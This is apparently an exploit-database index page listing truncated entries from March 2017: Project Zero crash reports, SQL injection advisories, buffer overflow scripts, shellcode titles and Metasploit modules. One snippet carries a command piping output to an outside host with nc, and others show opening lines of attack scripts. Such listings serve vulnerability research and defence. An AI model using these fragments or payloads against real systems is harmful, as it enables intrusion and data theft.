Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042 We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file: --- 6be8.6f1c: Access violation - code c0000005 first chance First chan...

Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052 We have encountered a crash in the Windows Color Management library icm32.dll, in the icm32!FillushortELUTsfromlut16Tag function, while trying to display a TIFF image with a malformed embedded color profile: --- 7c1c.93b0:...

Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053 We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file: --- 920c.9190: Access violation - code c0000005 first chance...

Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054 We have encountered a crash in the Windows Color Management library icm32.dll, in the icm32!LHCalc3toXDi16Do16Lut8G32 function, while trying to translate colors based on a malformed color profile file: --- 61e4.8620: Access...

D-Link DGS-1510 - Multiple Vulnerabilities

================ get-user-info.py ================ import re import os.path import urllib2 import base64 import gzip import zlib from StringIO import StringIO from io import BytesIO def makerequests: """Calls request functions sequentially.""" response = None responseText = None...

Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)

function run var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe; frame.contentDocument.onreadystatechange = eventhandler; form.reset; function eventhandler document.getElementById"textarea".defaultValue = "foo"; alert"Text value...

Mozilla Firefox - 'table' Use-After-Free

body display: table function freememory try fuzzPriv.forceGC; catcherr alert'Please install domFuzzLite3'; function go var s = document.getSelection; window.find"1",true,false,true,false; s.modify"extend","forward","line"; document.body.appenddocument.createElement"table"; freememory uZ1CqnaASOkr...

Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019 We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file: --- 4464.11b4: Access violation - code...

Linux/x86 - File Reader Shellcode (54 Bytes)

Linux/x86 - File Reader Shellcode 54 Bytes. Shellcode exploit for Linx86 platform ;================================================================================ ; The MIT License ; ; Copyright c ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software...

Secure Download Links - 'dc' SQL Injection

Exploit Title: Secure Download Links - SQL Injection Google Dork: N/A Date: 19.03.2017 Vendor Homepage: http://sixthlife.net/ Software: http://sixthlife.net/product/secure-download-links/ Demo: http://www.satyamtechnologies.net/secdown/example.php Version: N/A Tested on: Win7 x64, Kali Linux x64...

FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow

print ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day Date: 2017.03.19 Exploit Author: Greg Priest Version: FTPShell Server 6.56 Tested on: Windows7 x64 HUN/ENG Enterprise ''' overflow...

HttpServer 1.0 - Directory Traversal

Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal Date: 2017-03-19 Exploit Author: malwrforensics Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtmldownload Version: 1.0 Tested on: Windows Exploiting this issue will allow an attacker to view...

iFdate Social Dating Script 2.0 - SQL Injection

Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection Google Dork: N/A Date: 18.03.2017 Vendor Homepage: http://turnkeycentral.com/ Software: http://turnkeycentral.com/scripts/social-dating-script/ Demo: http://demo.turnkeycentral.com/ifdate/index.php Version: 2.0 Tested on: Win7 x64,...

DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation

Title: ====== Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router. CVE Details: ============ CVE-2017-6896 Reference: ========== https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896 https://vuldb.com/sv/?id.97954...

Omegle Clone - SQL Injection

Exploit Title: Omegle Clone - SQL Injection Google Dork: N/A Date: 18.03.2017 Vendor Homepage: http://turnkeycentral.com/ Software: http://www.turnkeycentral.com/scripts/omegle-clone/ Demo: http://demo.turnkeycentral.com/omegleclone/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author...

AXIS Communications - Cross-Site Scripting / Content Injection

0RWELLL4BS security advisory olsa-2015-8258 PGP: 79A6CCC0 @orwelllabs Advisory Information ==================== - Title: ImagePath Resource Injection/Open script editor - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Improper Input Validation CWE-20 - CVE Name:...

AXIS (Multiple Products) - Cross-Site Request Forgery

0RWELLL4BS security advisory olsa-CVE-2015-8255 PGP: 79A6CCC0 @orwelllabs Advisory Information ==================== - Title: Cross-Site Request Forgery - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Session Management control CWE-352 - CVE Name: CVE-2015-8255 - Affecte...

Departmental Store Management System 1.2 - SQL Injection

Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection Google Dork: N/A Date: 17.03.2017 Vendor Homepage: http://webstarslab.com Software : http://webstarslab.com/products/pasal-departmental-store-management-system/ Demo:...

FTPShell Client 6.53 - 'Session name' Local Buffer Overflow

print ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: FTPShell Client 6.53 Session name BufferOverflow Date: 2017.03.17 Exploit Author: Greg Priest Version: FTPShell Client 6.53 Tested on: Windows7 x64 HUN/ENG Professional ''' a = "A" 460 b =...

Linux/x86 - Encoded exceve("/bin/sh") Shellcode (44 Bytes)

Linux/x86 - Encoded exceve"/bin/sh" Shellcode 44 Bytes. Shellcode exploit for Linx86 platform ;================================================================================ ; The MIT License ; ; Copyright c ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of...

Linux/x86 - Bind Shell Shellcode (42 bytes)

Linux/x86 - Bind Shell Shellcode 42 bytes. Shellcode exploit for Linx86 platform / SuperSmallBindShell 2 x86 Date: 17.03.2017 This shellcode will listen on random port and show you how deep the rabbit hole goes Please note that ports below 1024 require high privileges to bind! Shellcode Author:...

SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SolarWind LEM Default SSH Password Remote Code Execution", 'Description' = %q This module exploits the default credentials of SolarWind LEM. A men...

Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory

!/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6 payload = '5\xc7\x07\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02' payload +=...

Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution

SSD Advisory – Oracle Knowledge Management XXE Leading to a RCE Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle's InQuira knowledge management products...

Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection

Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: ================= Windows DVD Maker...

Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free

f.onload = null; for var x in window if whitelist.indexOfx != -1 continue; try window.lookupGetterx.callf.contentWindow; logx; catch e ; f.src = "https://abc.xyz/"; document.body.appendChildf; And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JI...

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)

import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp s.sendpayl if r: data = s.recv10242 print "received %d...

Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)

Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE: CVE-2017-6880 Vendor: ===============...

WordPress Plugin Membership Simplified 1.58 - Arbitrary File Download

import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir...

Cobbler 2.8.0 - (Authenticated) Remote Code Execution

!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...

Joomla! Component Vik Appointments 1.5 - SQL Injection

Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection Google Dork: inurl:index.php?option=comvikappointments Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/livedemo/vikappointments/ Demo:...

Joomla! Component Vik Rent Items 1.3 - SQL Injection

Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection Google Dork: inurl:index.php?option=comvikrentitems Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-items-e4j Demo:...

Joomla! Component Vik Rent Car 1.11 - SQL Injection

Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection Google Dork: inurl:index.php?option=comvikrentcar Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-car-e4j Demo:...

PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation

Exploit Title: PCAUSA Rawether for Windows local privilege escalation Date: 2017-03-15 Exploit Author: ReWolf Vendor Homepage: original vendor website doesn't exist anymore Version: too many Tested on: Windows 10 x64 TH2, RS1 Rawether for Windows is a framework that facilitates communication...

ASUS PCE-AC56 WLAN Card Utilities (PCAUSA Rawether Windows 10 x64) - Local Privilege Escalation

ASUS PCE-AC56 WLAN Card Utilities PCAUSA Rawether Windows 10 x64 - Local Privilege Escalation. Local exploit for Winx86-64 platform Rawether for Windows is a framework that facilitates communication between an application and the NDIS miniport driver. It’s produced by a company named Printing...

Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021 Windows: COM Session Moniker EoP Platform: Tested on Windows 10 14393, Server 2012 R2 Class: Elevation of Privilege Summary: When activating an object using the session moniker the DCOM activator doesn’t check if the current...

Adobe Flash - Metadata Parsing Out-of-Bounds Read

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005 The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41608.zip...

Adobe Flash - MovieClip Attach init Object Use-After-Free

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006 The attached file causes a use-after-free in attaching a MovieClip and applying the init object. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41609.zip...

Adobe Flash - ATF Thumbnailing Heap Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015 The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf Proof of Concept:...

Adobe Flash - ATF Planar Decompression Heap Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016 The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf Proof of Concept:...

Adobe Flash - AVC Header Slicing Heap Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017 There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv Proof of Concept:...

IBM WebSphere - RCE Java Deserialization (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "IBM WebSphere RCE Java Deserialization Vulnerability", 'Description' = %q This module exploits a vulnerability in IBM's WebSphe...

Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Apache Struts Jakarta Multipart Parser OGNL Injection', 'Description' = %q This module exploits a remote code execution...

GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution

!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...

Sitecore CMS 8.1 Update-3 - Cross-Site Scripting

Exploit Title: Stored Cross Site Scripting XSS in Sitecore Experience Platform 8.1 Update-3 Date: March 15, 2017 Exploit Author: Pralhad Chaskar Vendor Homepage: http://www.sitecore.net/en Version: 8.1 rev. 160519 Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519 CVE :...

GitHub Enterprise < 2.8.7 - Remote Code Execution

!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...

Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow

Date: 15-03-2017 Author: Hossein Lotfi https://twitter.com/hosselot CVE: CVE-2016-7274 1. Description An integer overflow error within the "LoadUvsTable" function of usp10.dll can be exploited to cause a heap-based buffer overflow. Full analysis is available at:...

Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection

Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection Google Dork: inurl:index.php?option=comsimplemembership Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...

Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection

Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection Google Dork: inurl:index.php?option=comadvertisementboard Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...

APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow

Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian / Windows 7 CVE : CVE-2017-6192...